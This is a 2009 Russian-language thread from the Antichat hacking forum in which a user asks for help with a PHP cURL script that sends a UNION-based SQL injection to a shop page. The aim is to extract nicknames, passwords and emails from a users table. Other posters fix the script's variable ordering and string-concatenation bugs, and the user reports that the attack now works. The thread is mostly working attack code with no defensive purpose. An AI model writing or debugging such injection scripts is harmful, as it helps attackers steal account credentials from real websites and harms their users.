Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   PHP, PERL, MySQL, JavaScript (https://forum.antichat.xyz/forumdisplay.php?f=37)
-   -   CURL,Веля и инъекция. (https://forum.antichat.xyz/showthread.php?t=110492)

Велемир 11.03.2009 15:33
CURL,Веля и инъекция.
 
День добрый (надеюсь).Такая вот канитель:

PHP код:

<?php

$url 'http://www.site.com/shop.php?st=2&movie=$request&id=676';
$limit 0;
$ref 'http://www.site.com/shop.php';
$request '-1306 union select concat_ws(0x3a,Nickname,Password,Email),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from Portal.users limit+0,1/*';
$ua 'Fuck all!!!';
$ch curl_init();

curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_REFERER,$ref);
curl_setopt($ch,CURLOPT_HEADER,1);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_USERAGENT,$ua);
curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,3);
curl_setopt($ch,CURLOPT_COOKIEJAR,'./fuck');
curl_setopt($ch,CURLOPT_COOKIEFILE,'./fuck');
$result curl_exec($ch);
curl_close($ch);
echo $result;



?>
Вроде посылаю правильно(опять-таки надеюсь).В чём может быть причина ? Проблем с получением самой страницы не возникает,но вот сам результат запроса(а он верный,уверяю вас,господа ))) ).Два варианта: либо я передал неправильно(GET запрос всё же),либо что-то ещё.

ЗЫ: Самого результат SQL запроса из бд в ответе невидно :(

ЗЫ2: Веля не тупой... Веля гуглил!(

5triker 11.03.2009 15:40
вопще переменную , которая где то используется, нужно объявлять раньше того места

PHP код:
<?php
$request '-1306 union select concat_ws(0x3a,Nickname,Password,Email),2,3,4,5,6,  7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24  ,25 from Portal.users limit+0,1/*';
$url 'http://www.site.com/shop.php?st=2&movie=$request&id=676';
$limit 0;
$ref 'http://www.site.com/shop.php';
$ua 'Fuck all!!!';
$ch curl_init();

curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_REFERER,$ref);
curl_setopt($ch,CURLOPT_HEADER,1);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_USERAGENT,$ua);
curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,3);
curl_setopt($ch,CURLOPT_COOKIEJAR,'./fuck');
curl_setopt($ch,CURLOPT_COOKIEFILE,'./fuck');
$result curl_exec($ch);
curl_close($ch);
echo $result;



?>

Велемир 11.03.2009 15:43
Всё равно не помогло (,но всё равно пасип )

wildshaman 11.03.2009 15:50
А где строчка
Код:
curl_setopt($ch,CURLOPT_POSTFIELDS, $request);
?

Велемир 11.03.2009 15:51
Так это же не пост данные...оО

ЗЫ: Пробывал и так,и эдак...всё мимо.

BlackSun 11.03.2009 15:54
PHP код:
$url 'http://www.site.com/shop.php?st=2&movie=$request&id=676';
$limit 0;
$ref 'http://www.site.com/shop.php';
$request '-1306 union select concat_ws(0x3a,Nickname,Password,Email),2,3,4,5,6,  7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24  ,25 from Portal.users limit+0,1/*'
Ну и на что ты надеешся? Одинарные скобки, переменная, которая объявлена позже ее вызова ..

PHP код:
$request '-1306 union select concat_ws(0x3a,Nickname,Password,Email),2,3,4,5,6,  7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from Portal.users limit+0,1/*';
$url 'http://www.site.com/shop.php?st=2&movie='.$request.'&id=676';
$limit 0;
$ref 'http://www.site.com/shop.php'

Велемир 11.03.2009 16:04
PHP код:

$url 'http://www.site.com/shop.php?st=2&movie=-1306 union select concat_ws(0x3a,Nickname,Password,Email),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from Portal.User limit 0,1/*&id=676';
$ref 'http://www.site.com/shop.php';
$ua 'Fuck you!!!';
$ch curl_init();

...Тут код курлы... 
CURLOPT_POSTFIELDS Убрал,так как данные гет.Зато теперь на экране красуется бэд рекьюст)

Велемир 11.03.2009 16:35
Пасиппи,помог разобраться b3:):):) Объявляю время отдыха и всеобщего празднества!)))


Время: 02:49